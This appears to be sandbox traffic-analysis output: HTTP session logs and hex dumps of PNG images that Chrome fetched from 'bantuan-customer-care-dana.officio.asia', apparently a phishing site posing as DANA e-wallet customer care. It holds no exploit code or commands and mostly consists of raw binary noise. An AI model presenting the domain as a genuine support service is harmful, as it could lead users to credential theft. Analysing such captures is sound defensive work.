                                                  Data Ascii: {WCTuI t7,|[:iIE_2V]E"r<n""^ZUDNn amysI.9PU`-$Y+{;r8Nj=k'9X^v2}!@k%T*4y.o"roT*?g>UY_<HQydn^LU!9g
                                                  2024-10-13 17:33:28 UTC1369INData Raw: aa cf 4d 4e 4e 16 3e b3 33 3c 3c bc 1f c9 87 f3 7e be 80 5c 6c 0e 58 02 3c cf bb 32 43 e1 cf 72 ab c6 fc 14 64 56 b7 c6 75 dd 8b 72 4a 97 24 a9 aa 0f 90 2c 5d 9f 9c 64 45 55 1f cf f3 59 5d d7 7d 47 d1 cf 95 85 52 0f d2 43 c8 d4 ab ea b3 ce 82 90 9c 02 d0 6a 73 be 57 44 96 47 e4 99 44 3e 0b 82 db 01 1c 25 22 a5 de 93 44 f2 08 92 5b 73 18 58 b3 04 13 04 99 e8 16 61 d3 6e 17 89 ba 4f cb a3 e2 fd 4f f3 8f c9 c9 c9 e3 d0 ba 72 10 c0 39 22 72 48 d9 95 03 00 44 e4 b7 8e e3 f4 90 dc d8 62 52 3f cb 45 20 cb 6c 98 d2 12 bb aa 3e 1a 89 97 87 19 d3 59 ad ac aa ee 68 31 bd 11 76 b1 e5 76 92 6f 6f e1 d9 bb ee b9 bb 42 60 11 99 a4 ef d8 b3 51 b8 59 0e 21 55 f5 d6 1c f2 66 e4 ef 56 b6 b0 df 23 22 cb bb 61 81 2c 09 11 d9 30 3d 3d fd 8a 26 a2 3e d5 cd cf 5d 7a 48 1e 95 e6
                                                  Data Ascii: MNN>3<<~\lX<2CrdVurJ$,]dEUY]}GRCjsWDGD>%"D[sXanOOr9"rHDbR?E l>Yh1vvooB`QY!UfV#"a,0==&>]zH
                                                  2024-10-13 17:33:28 UTC1369INData Raw: c4 bd 2a 63 dc 24 3c 92 47 92 5c 12 d7 7a a8 6a d8 f5 5a 92 21 cd 4d 45 95 bb a5 8b 20 b9 7f cc a2 9c cb 60 7d 21 08 53 25 b9 27 43 e5 53 55 fd 7e 10 57 48 5e c0 e6 6c f7 7a 24 af b9 ee ba eb 1c 92 87 33 59 d9 fe 36 c8 eb b3 69 13 76 5d f7 03 45 95 b9 a5 0b 21 b9 39 a6 1e 7d 2d 12 e6 aa 8c 15 5c 49 7e 99 fb 56 bc 1d 92 67 ab ea bf a8 ea 6e fa 6b 1a 6e f0 6f 5a 55 07 49 de 45 f2 0d 24 7b c2 38 aa 7a 73 9d 3c 6a 86 7c a9 5b ab 8d 1b 37 96 ce f6 af a5 e4 90 7c 47 4c 25 9b 22 79 b0 11 a6 5f 55 77 a5 ad 88 a4 df 05 22 b9 8d e4 ef 33 61 f6 2a 46 96 c3 e9 2b 4b bd 4a af 24 57 05 e1 ff 39 83 48 77 b6 ab 0c e7 3b 0b 7e 0b 42 50 81 7f 03 20 6a 9d e3 5e 00 67 07 bb 85 41 f2 54 00 bf 04 90 d9 ff 39 7d d3 3f 3b 00 3c a8 aa 9b 1d c7 19 51 d5 03 1c c7 39 15 c0 7a 00 8b
                                                  Data Ascii: *c$<G\zjZ!ME `}!S%'CSU~WH^lz$3Y6iv]E!9}-\I~VgnknoZUIE${8zs<j|[7|GL%"y_Uw"3a*F+KJ$W9Hw;~BP j^gAT9}?;<Q9z
                                                  2024-10-13 17:33:28 UTC1369INData Raw: d5 ea 2c 65 0d e4 bb 85 fe a0 3a 0b c3 00 50 a9 54 46 13 ee cf 5c 67 93 5d cd a0 8c bf 15 fc 06 80 83 9a 49 07 00 44 24 34 88 27 00 b6 35 9b 4e 5a da e9 f9 74 3c fc 51 ad 56 a7 e3 02 90 1c 14 91 25 00 0e 12 91 5d 71 61 00 bf 35 02 10 b6 18 da db db 9b a9 79 8e e1 1b c1 ff 02 a0 5e 5a e7 44 fe fe 78 33 ad 88 aa fe 22 63 94 86 0a 72 e8 a1 87 86 69 7f 0e fe 6c 0f e0 3f cf 83 24 d7 64 c8 6b 18 a8 fb 11 9b 0c 7f 88 88 97 21 5d 93 4d 81 6c 10 91 db 44 a4 6e 0b 5a 0f 11 d9 8d 40 66 00 3d 6c 30 e1 51 5a 5c d7 3d df 68 52 4f 8d de 27 f9 64 d0 4c 36 fc 9a 70 b6 fd db 3f 6a 55 36 46 5c 97 6d d8 b0 21 f6 8b ae aa 23 41 90 27 8c e0 5f cf 98 d7 a2 a0 fb b3 9b be 37 ab 90 c4 2e 22 c9 81 46 5d 2c 06 e3 36 cf f3 fe 38 f8 7b c2 48 5b 49 2e 4e 29 df 15 24 39 3d 3d bd 3e e1
                                                  Data Ascii: ,e:PTF\g]ID$4'5NZt<QV%]qa5y^ZDx3"cril?$dk!]MlDnZ@f=l0QZ\=hRO'dL6p?jU6F\m!#A'_7."F],68{H[I.N)$9==>
                                                  2024-10-13 17:33:28 UTC960INData Raw: cb 5a 15 6c 7c 7c dc 1c c0 aa 88 cc fa 02 05 15 57 48 ee a9 93 cc c9 c6 ef ad c1 ff f7 c2 ff 22 9f 52 27 9e f9 45 8d ad 94 69 0e 68 79 9e b7 3a f8 b9 5f a3 b0 41 9a df 03 70 85 71 29 6c 49 96 01 c0 b2 65 89 0b dc ad d6 91 1b 4d 31 98 83 5b ea 15 2b 56 7c ce f8 73 4f 57 fa 80 a7 7f 70 29 e4 8c b8 30 c1 a1 a7 90 7a 1b 1a df 91 e7 57 88 b3 17 af e6 6c 63 67 30 c1 a0 aa 77 d6 4b c7 dc 96 4e 32 9c 02 7d bc 5e 1c 92 33 e7 64 6a b5 da ef 26 84 49 b3 d5 24 5c e0 ab 3b dd 1c 13 ef 4b 91 96 64 2c f8 3f a9 05 31 77 32 64 6e 41 00 20 38 0c 15 72 57 33 69 44 64 32 0f c1 bd b4 d5 f4 0a 81 e4 9b 8d 87 48 dc bb 4f 72 93 11 ee b7 49 e1 54 75 ca a8 58 e7 35 2b 97 d9 3c 27 ad 34 93 fc 42 10 e4 2b f5 d2 da b3 67 8f b9 ca 1c 52 77 a3 a0 eb ba ef 37 c2 7e 32 21 ff a7 53 28 48
                                                  Data Ascii: Zl||WH"R'Eihy:_Apq)lIeM1[+V|sOWp)0zWlcg0wKN2}^3dj&I$\;Kd,?1w2dnA 8rW3iDd2HOrITuX5+<'4B+gRw7~2!S(H


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  22192.168.2.449777104.21.61.834435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC384OUTGET /ast/img/load_spin.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:28 UTC700INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 5078
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:22:56 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7075
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=md2qT2PwjGxYkX%2BqZJ0sJMCg%2F1nC3jTQE95qy0BPbkZo42d8C4n%2BOqRiIHBybhK0g1epuGC5k7pzMjnnxvF2EJM0GW2dWozkYDFqjTSK%2FxXEb%2B6DAj2isJxiSBQS9cHcsuZQuT5%2Fclsoy%2FxM58suNGj4b15MP%2FBlGDw%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21132fbfde4340-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:28 UTC669INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 04 00 00 00 07 51 66 15 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 06 82 fe 92 c0 00 00 12 aa 49 44 41 54 78 da ed 9d f9 7b 14 d7 95 86 df 5a 7a 51 ab b5 81 5a 3b 20 c9 80 43 8c 6d c6 78 89 6d 12 1b 18 2f f3 78 e6 c9 3f 3b 36 4e 66 1c c7 4e e2 cc 04 c6 76 12 b0 8d 6d 04 02 24 a1 0d 21 a9 5b ea 56 57 57 cd 0f 75 fb f6 ad d6 d6 6b 55 83 ee a7 07 d1 dd 52 dd 7b ce f9 74 ce b9 e7 2e 55 06 4f 01 bc bd 3e 34 b0 30 b1 88 11 27 8e 01 38 94 28 52 c0 a1 b4 df 25 9d 8f 0e 96
                                                  Data Ascii: PNGIHDRQfgAMAa cHRMz&u0`:pQ<bKGDtIMEIDATx{ZzQZ; Cmxm/x?;6NfNvm$![VWWukUR{t.UO>40'8(R%
                                                  2024-10-13 17:33:28 UTC1369INData Raw: e0 ba 5b 11 ef a0 1f 9b a4 18 20 c3 30 63 64 e8 11 03 e5 ea 21 82 87 c3 3a f7 f9 89 c5 f2 58 2c 6c 03 85 da 9f 34 59 8a 57 f8 88 8b 0c 60 06 02 94 4d 0c 8b 1c 33 dc e0 6b 6e f3 80 b5 6a 1a ea 15 78 17 4d 3e 35 c3 9c 60 82 63 d8 c2 d3 d4 81 b3 cb 36 73 fc c8 7c 39 dd 87 69 a4 d0 fa 92 86 e9 e6 35 3e e2 45 d2 82 0c 5b 86 27 9b 3c 33 7c c1 17 7c cf 5a eb c5 dc 45 4d 37 23 3c c7 14 03 58 92 96 8a af 14 58 e0 47 e6 c3 f6 94 50 fa 51 3c e3 75 3e e4 3c 29 0c c5 2f 62 d8 14 79 c0 df f8 9c 7f f2 b8 fd c2 05 a8 e9 66 94 d3 4c d0 8b b9 ab c8 dc 61 81 9f c3 0d 5f 6d ef 43 2a df c5 2b 7c c0 79 ba 04 19 b6 20 03 96 f8 86 3f f0 2d cb 21 8a 45 15 2d 69 c6 79 8e 51 52 c2 47 2a 75 4b 81 47 dc 65 a9 1c 3a db 2d 59 9b db 17 4a c7 b9 c0 fb bc 10 f0 8c 18 31 b6 b9 c5 e7 fc 8d
                                                  Data Ascii: [ 0cd!:X,l4YW`M3knjxM>5`c6s|9i5>E['<3||ZEM7#<XXGPQ<u><)/byfLa_mC*+|y ?-!E-iyQRG*uKGe:-YJ1
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 84 92 7d 3d c4 03 b0 18 96 b5 b9 c7 03 56 1a ed 46 a3 56 1c 9c 43 fa 49 cb d1 d5 13 1e f8 2f 34 da 89 7d 08 11 93 25 c7 a5 fd 8b cc b2 a3 e9 68 3f 0e f2 90 3e b9 89 01 16 ab ef ad a0 d1 1e ec 49 88 f0 8f 7e f1 d6 20 cf bc 1e 5d 85 83 fd 3d a4 57 59 f9 5a d2 c5 60 58 d8 83 10 e1 1f 7d e2 ad 41 5e 17 83 e1 61 3f 0f f1 ef 28 e5 63 99 bc a6 23 2c ec 22 c4 03 b0 e5 3e 3c 83 3c ab 51 0b 79 94 b0 b7 87 a4 e5 64 3b ac 6a ff 08 13 55 84 08 ff 48 4b 06 b4 7f 84 8c bd 3c a4 4b f1 8f 35 0a da 3f c2 44 80 10 b1 15 2e 25 3f d8 51 ef ef a6 11 06 76 7b 48 5c 19 5f ad 6b ff 08 1b bb 09 49 0a 06 0c 4a ac 47 2d de d1 83 42 88 98 70 af d4 e7 5b 7a 23 5c f8 a8 f6 90 b8 dc 2a ea b1 a9 37 33 84 8f 6a 42 12 32 60 39 e5 fb 0b 6a 84 09 49 88 08 58 95 84 be 45 51 fb 47 f8 08 7a 88
                                                  Data Ascii: }=VFVCI/4}%h?>I~ ]=WYZ`X}A^a?(c#,"><<Qyd;jUHK<K5?D.%?Qv{H\_kIJG-Bp[z#\*73jB2`9jIXEQGz
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 1d ee 28 f6 9f e6 2d 7f 44 71 74 29 91 75 79 9f 3c 53 63 e0 e1 f8 7f b8 f5 65 f7 3a 93 8f 28 13 bf e3 be f2 e1 39 2e 1d 65 2f 91 de 31 a0 9c 5d f6 70 fc 7b 63 d4 3b d8 6a 6c 34 50 e4 5b e6 95 be ce 73 d9 17 e6 e8 51 22 53 f9 f1 c0 c6 74 c7 3f 8b 56 ff d8 b7 6e 42 44 17 db dc 60 51 e9 ef 1c ef d3 a7 08 78 44 20 07 ba 19 ba 15 e5 1d f2 8d 1a a2 01 0f 11 2c 6c f2 3f ca 94 a3 c7 59 fe 9d 21 45 c8 23 00 a1 69 17 a3 01 ef 28 92 ab 3f 99 97 d1 50 c8 12 1d 3d e1 cf 8a 97 78 9c e4 b7 9c 54 04 7d c6 21 b4 4c 33 4a 52 bc 31 80 22 d9 c6 e9 68 f8 5e ef a2 b3 35 be e0 a1 42 c9 30 bf e5 17 fe cb 67 9b 14 a9 5f 3f e3 81 d3 ca 05 36 1a 19 5b 55 d0 c4 5d 7f e4 5f c8 25 ce 62 63 61 61 11 23 cf e7 dc 68 4e a8 4e 87 5c 9c 1d 64 08 bf da f0 ff 6d b2 de 8c 77 34 77 65 45 b0 04
                                                  Data Ascii: (-Dqt)uy<Sce:(9.e/1]p{c;jl4P[sQ"St?VnBD`QxD ,l?Y!E#i(?P=xT}!L3JR1"h^5B0g_?6[U]_%bcaa#hNN\dmw4weE
                                                  2024-10-13 17:33:28 UTC302INData Raw: 1c f3 ac 90 55 9e db d8 51 46 e8 24 59 24 02 c4 18 f4 30 c4 29 a6 39 cd 18 c7 48 93 22 49 0c 03 43 e4 15 37 10 9e fc 7c 51 a4 48 81 3c db 6c f0 98 25 e6 78 c4 12 eb ca a3 06 3a 54 f9 4e 94 49 62 57 1d 61 93 a0 8b 14 bd f4 d2 43 37 5d a4 38 46 37 71 5c 0a 38 ec 90 25 cb 3a 5b e2 6b 9b 6d f2 e4 95 47 70 74 ba ca 1d 2e 9d 82 03 f6 0a 1b 18 1c ba 9d f8 69 51 f4 69 91 73 1f ec c5 c1 d3 ad d2 ff 03 a7 df fc 4c 5a 4c 97 a8 00 00 00 25 74 45 58 74 64 61 74 65 3a 63 72 65 61 74 65 00 32 30 32 32 2d 31 30 2d 33 30 54 31 38 3a 31 33 3a 35 38 2b 30 30 3a 30 30 82 8b d9 6b 00 00 00 25 74 45 58 74 64 61 74 65 3a 6d 6f 64 69 66 79 00 32 30 32 32 2d 31 30 2d 33 30 54 31 37 3a 32 32 3a 33 32 2b 30 30 3a 30 30 c0 99 ef 14 00 00 00 28 74 45 58 74 64 61 74 65 3a 74 69 6d 65
                                                  Data Ascii: UQF$Y$0)9H"IC7|QH<l%x:TNIbWaC7]8F7q\8%:[kmGpt.iQisLZL%tEXtdate:create2022-10-30T18:13:58+00:00k%tEXtdate:modify2022-10-30T17:22:32+00:00(tEXtdate:time


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  23192.168.2.449779104.21.61.834435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC377OUTGET /ast/img/bi.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:29 UTC689INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 16542
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:22:08 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7077
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hW5Xelw7F4KMTZU2v2uavqvXD9vsmocjqk4aT6cCR6aURdzKdeT9yR9fgp%2BClVtl5YAfZr7HABmjLC8Kz0OYbYjznYlc6pDJfUwMcR6Ad9w3dELDZItVy%2B2ZQ4NwQdIfLo9aowxzKn26ul1sUV0k4H8HjlnMGclxAbI%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21132ff95d9e16-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:29 UTC680INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 68 00 00 00 c8 08 06 00 00 00 c5 8e 7b 8f 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 79 98 24 55 95 b7 df 13 99 b5 f6 de 74 b3 36 b2 36 3b 0a b4 cb 80 0a e2 82 88 88 c0 27 a8 e3 86 0b 38 2a 2e 28 e2 8a 36 33 32 22 6e e8 88 83 3a 2a ee 08 b8 cc e0 07 8a 62 a3 a8 0c 7e a0 80 ec cd d2 d0 74 d3 f4 de d5 4b 55 56 65 dc df f7 c7 8d e8 cc ca ce ca 8c cc ca da ef fb 3c f5 f4 52 11 37 4e dc b8 71 e2 dc 73 cf 39 17 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 00 80 8d b5 00 81 40 56 24 b5 03 5d c9 4f 3b
                                                  Data Ascii: PNGIHDRh{sRGBsBIT|d IDATxy$Ut66;'8*.(632"n:*b~tKUVe<R7Nqs9@ @ @ @ @ @ @ @ @V$]O;
                                                  2024-10-13 17:33:29 UTC1369INData Raw: 18 cb 13 98 24 04 05 1d 18 36 92 3a 81 d7 e0 95 f3 51 f8 24 93 a9 48 11 b8 15 b8 0c f8 55 c8 58 0c 0c 97 a0 a0 03 4d 93 58 cd 7b 00 9f 04 5e 07 cc 64 f8 63 6a 83 a4 07 cc 6c 40 d2 90 b1 d0 e9 ef 2a ff cc f2 fb 2a c7 76 9a d9 51 40 7e 98 b2 a7 ac 07 be 0d 7c 11 58 1d 32 14 03 81 c0 a8 22 a9 4d d2 cb 24 dd 2a a9 95 a9 7e bf 91 34 4f 92 8d e2 cf 3e 92 7a 5a 78 0f 92 e4 9c 73 37 49 7a 81 a4 a9 3a a3 08 04 02 a3 8d a4 2e 49 ef 95 b4 42 ad 55 ce 92 f4 9b 9e 9e 9e 9d 46 f9 7e f6 56 eb 15 b4 24 c5 92 1e 93 f4 56 49 1d a3 79 4f 81 c9 41 ab a6 74 81 29 82 a4 f9 c0 85 c0 3b f1 15 e5 5a cd 8c 19 33 66 1c 2a 69 03 d0 0f 6c 03 d6 9a 59 6f ab 2e 20 9f 4a 3e 0d e8 c4 bf 03 bb 30 32 0b 9a 11 b0 37 70 b9 73 6e 3f 49 5f 34 b3 0d 23 70 9d c0 24 25 f8 a0 03 99 91 b4 37 de af
                                                  Data Ascii: $6:Q$HUXMX{^dcjl@**vQ@~|X2"M$*~4O>zZxs7Iz:.IBUF~V$VIyOAt);Z3f*ilYo. J>027psn?I_4#p$%7
                                                  2024-10-13 17:33:29 UTC1369INData Raw: 81 73 36 6f de 1c ac e8 29 48 50 d0 53 8c c4 7a 7e 0d f0 ac 51 bc 6c 27 0d 28 e8 31 b6 a0 c1 cb fa 3a 20 ab 9b c3 39 e7 96 8c a0 3c 47 cf 98 31 e3 94 11 6c 3f 30 4e 09 0a 7a ea b1 33 f0 3e 46 76 ff bd 4a 1a ba d6 38 b0 a0 c1 97 34 dd 2b cb 81 66 a6 28 8a ee 19 41 59 f2 c0 07 d4 e0 46 05 81 89 4f 50 d0 53 8b d4 32 dc 6d ac 05 a9 c5 38 b0 a0 c1 57 bf cb 5c 77 1a 18 c9 8d 60 0d 1f a7 fe aa 11 bc 46 60 1c 12 14 f4 14 42 d2 ae 92 5e 4d ed 32 a2 63 ce 38 b1 a0 23 1a fb 90 35 52 a3 ba 19 a6 01 a7 49 1a b2 06 6b 60 f2 11 14 f4 14 21 89 02 78 16 70 14 e3 3c 83 74 9c 58 d0 11 5e 29 66 65 a4 c3 15 0d 1f 13 1d b6 c8 9a 42 04 05 3d 75 e8 00 4e 35 b3 99 63 2d 48 3d c6 89 05 2d 7c aa 7a 56 76 1e 29 41 ca d8 09 38 5d d2 a4 2c ef 1a d8 91 a0 a0 a7 0e bb 00 13 22 12 60 9c
                                                  Data Ascii: s6o)HPSz~Ql'(1: 9<G1l?0Nz3>FvJ84+f(AYFOPS2m8W\w`F`B^M2c8#5RIk`!xp<tX^)feB=uN5c-H=-|zVv)A8],"`
                                                  2024-10-13 17:33:29 UTC1369INData Raw: 0d bc 52 d2 fb 80 bf 27 8a 78 48 92 88 90 9b 25 dd 09 bc 19 f8 04 3e cc 6d cc 2c 58 e7 5c ae bc 5f 02 93 8b f0 64 27 29 4f 3f fd 74 43 e1 68 e3 89 8a 54 ef cc ca 4f 12 40 2f b0 5c d2 df 81 1b 80 2b 81 3b 87 38 a5 1d 38 1a b8 0e f8 97 75 eb d6 65 aa 4c 67 66 1b 81 cb 81 b3 80 db 94 5c 78 2c 88 a2 68 80 3a a5 51 03 13 97 60 41 4f 52 76 d9 65 97 98 0c 5b 36 8d 47 ea 24 aa 08 58 01 dc 0f 6c 70 ce 6d 04 9e 8e a2 e8 49 33 7b 12 58 d3 df df bf a5 bd bd 7d 0b 3e ad db 01 5f 04 8e 1a a2 3d c3 2f 1e 5e 3a 77 ee dc c3 24 7d cc cc 36 d5 93 31 f1 5d df 20 e9 11 33 fb 1c f0 2a c6 66 01 71 00 7f 8f 81 49 48 50 d0 93 17 87 8f 46 98 70 d4 49 54 29 3a e7 7e 1c 45 d1 85 80 a2 28 4a 5d 18 c2 47 7d 0c b2 26 33 6e f5 65 f8 b4 e9 73 80 9d b6 6d db f6 a1 ee ee ee 27 b3 c8 6a 66
                                                  Data Ascii: R'xH%>m,X\_d')O?tChTO@/\+;88ueLgf\x,h:Q`AORve[6G$XlpmI3{X}>_=/^:w$}61] 3*fqIHPFpIT):~E(J]G}&3nesm'jf
                                                  2024-10-13 17:33:29 UTC1369INData Raw: 49 4b 47 50 9e 7a 08 1f ef fc 61 e0 fb 87 1e 7a 68 a6 0c 4c 49 bb 00 5f 01 0e a2 35 ae 8d 22 70 1d c1 f7 3c 65 09 0a 7a 8a 92 58 64 1f c3 97 c3 1c 49 14 c7 f1 3f 68 c0 af 3c 63 c6 8c 1e 33 fb 55 12 5a 36 da f4 e3 15 e2 6b 80 1f 64 f5 fb 4a 9a 09 7c 02 78 25 ad 7b af 9e 02 3e 67 66 13 6e 67 f6 40 6b 08 0a 7a 6a b3 14 f8 32 23 5b a3 63 55 2e 97 fb 7b d6 f0 34 00 33 eb c7 87 b4 dd cb e8 f9 a2 d3 3d fe 3e 0d 9c 6e 66 ff 2f 6b 42 88 a4 dd 80 cf 02 ef c1 57 bc 6b 05 db 92 36 97 b5 a8 bd 40 20 30 d1 90 b4 9b a4 bf 4a 72 6a 3d b1 a4 6f 4a 9a de 84 5c 26 e9 85 92 96 26 ed a4 f2 f5 4b ba b8 81 76 a6 25 32 54 e2 92 76 fb 93 fb 7f eb b6 6d db f6 94 d4 90 d1 22 69 6f 49 ff 93 b4 d3 ca 7e bb 4e d2 78 28 6d 1a 18 43 5a 59 06 31 30 01 31 b3 a7 24 5d 08 fc 88 d6 85 85 01
                                                  Data Ascii: IKGPzazhLI_5"p<ezXdI?h<c3UZ6kdJ|x%{>gfng@kzj2#[cU.{43=>nf/kBWk6@ 0Jrj=oJ\&&Kv%2Tvm"ioI~Nx(mCZY101$]
                                                  2024-10-13 17:33:29 UTC1369INData Raw: d7 63 63 2d 50 60 72 32 59 5e 98 c0 38 45 52 5b 5f 5f df 1e 9d 9d 9d ff 2c e9 f5 66 b6 0f 30 6d ac e5 6a 92 cd c0 c3 c0 f7 81 6b 80 a7 27 d3 b6 5e 81 40 60 8a 22 bf f1 eb 9e 92 ce 96 74 8d fc 86 ab 13 01 e7 9c 7b 5a d2 4f 24 bd 45 d2 6e 8d 26 ca 04 02 cd 12 2c e8 c0 a8 22 bf 77 e1 6c bc 6f fa 95 c0 69 c0 33 f0 56 f5 78 a8 96 27 fc 66 04 5b f0 35 3c 7e 01 dc 00 2c 33 b3 8d 63 29 58 60 ea 11 14 74 60 cc 90 4f 1c 99 06 fc 13 f0 62 e0 59 c0 01 92 16 24 49 23 a3 35 3e 85 5f 9c 5c 8e df a5 fc ef c0 4d c0 ed 40 6f 70 63 04 c6 8a a0 a0 03 e3 06 f9 f8 e7 bd 93 9f 23 81 45 c0 21 f8 8c bf 3c 90 c3 57 60 6c 66 9f 40 e1 17 f7 e2 e4 cf 22 be e8 ff bd 78 45 7c 17 b0 8c 60 29 07 c6 11 41 41 07 c6 25 f2 71 d0 ed f8 82 fb cf 00 0e 05 f6 77 ce ed 15 45 d1 9e f8 d4 f2 f4 98
                                                  Data Ascii: cc-P`r2Y^8ER[__,f0mjk'^@`"t{ZO$En&,"wloi3Vx'f[5<~,3c)X`t`ObY$I#5>_\M@opc#E!<W`lf@"xE|`)AA%qwE
                                                  2024-10-13 17:33:29 UTC1369INData Raw: 57 37 33 80 86 ba ce 7e 92 96 56 91 f1 d8 5a 3b 58 27 f7 77 9a 17 cd ad 94 74 e2 30 e5 30 49 8b 9c 73 cb cb 64 71 92 2e 4d 5e ce 6a e7 e4 25 bd d8 39 b7 56 d5 71 15 3f 43 1d b3 4e d2 8d 92 5e b3 74 e9 d2 8e 61 dc 43 b7 a4 f7 4b ba 43 52 5f 95 eb c4 92 62 e7 5c ac 8a 77 a8 8c ad 92 6e 2e 16 8b af 91 54 77 23 5d 49 0b 92 fe ef 93 f4 6f f2 bb d1 34 4d 4f 4f cf 4e 92 7e 95 c8 97 72 ab a4 7d 6a c8 30 5f 7e b7 f6 aa f7 3b c4 4f f9 33 e9 97 9f bd 0f d5 fe 74 49 9f 95 b4 5e 83 c7 46 b9 4e 2a ef cb ad 92 ce 1c a2 ad 6e 49 9f 71 ce f5 97 1d 1f c7 71 fc 55 35 e9 9e 90 1f bb af 95 b4 2d f9 79 5d 33 ed 34 72 c1 4e 49 bf 2e bf 01 49 57 49 ba 4c d2 17 24 7d 5b d2 ff 4a 7a aa e2 41 16 24 7d a6 d9 41 22 e9 10 49 2b 92 b6 06 24 7d 6c 18 f7 90 2a 68 27 e9 6f 92 16 36 db 56
                                                  Data Ascii: W73~VZ;X'wt00Isdq.M^j%9Vq?CN^taCKCR_b\wn.Tw#]Io4MOON~r}j0_~;O3tI^FN*nIqqU5-y]34rNI.IWIL$}[JzA$}A"I+$}l*h'o6V
                                                  2024-10-13 17:33:29 UTC1369INData Raw: 05 ff e4 1d 5d 82 5f 24 ac 15 14 d0 cf e0 08 0e 47 fd 71 36 14 bb 03 af a8 fc cf 28 8a ce 52 93 b3 ff ed 6d d4 f8 9d 68 ac b3 ef 4d 7e 00 30 b3 fd a8 88 5c c8 c0 1b 81 19 c9 df e3 44 06 03 5e db d3 d3 33 b3 c1 b6 86 a2 dd cc 3e 0c bc 31 ab 65 53 41 4c e9 c1 66 8d 0a d9 1e 36 36 c4 bf 01 e8 ef ef 3f 14 f8 9c bc 2b c3 24 3d 01 9c db d1 d1 51 35 8a a2 c5 54 3e eb fe 6a 32 66 a4 2b 8a a2 f3 80 b7 34 f9 61 2d 97 c5 31 f8 45 aa 86 a8 78 16 b9 5c 8e f2 e8 a3 7a 98 d9 6a e0 63 c0 95 65 6d e5 80 7f 06 4e aa 7a 51 ef a3 3f df cc 9e 9f 84 3a 09 d8 08 bc 0b f8 65 33 61 87 66 26 33 7b 18 6f f0 2c a1 74 ef 1d 51 14 9d bd db 6e bb fd 53 35 ab b8 ca bd 46 c0 cb 80 4b 24 cd 6a 54 0e 4a 61 68 24 32 d4 fd e2 15 8b c5 34 aa ab 21 3a 3b 3b d7 02 57 cc 98 31 63 6b 95 5f cf 61
                                                  Data Ascii: ]_$Gq6(RmhM~0\D^3>1eSALf66?+$=Q5T>j2f+4a-1Ex\zjcemNzQ?:e3af&3{o,tQnS5FK$jTJah$24!:;;W1ck_a
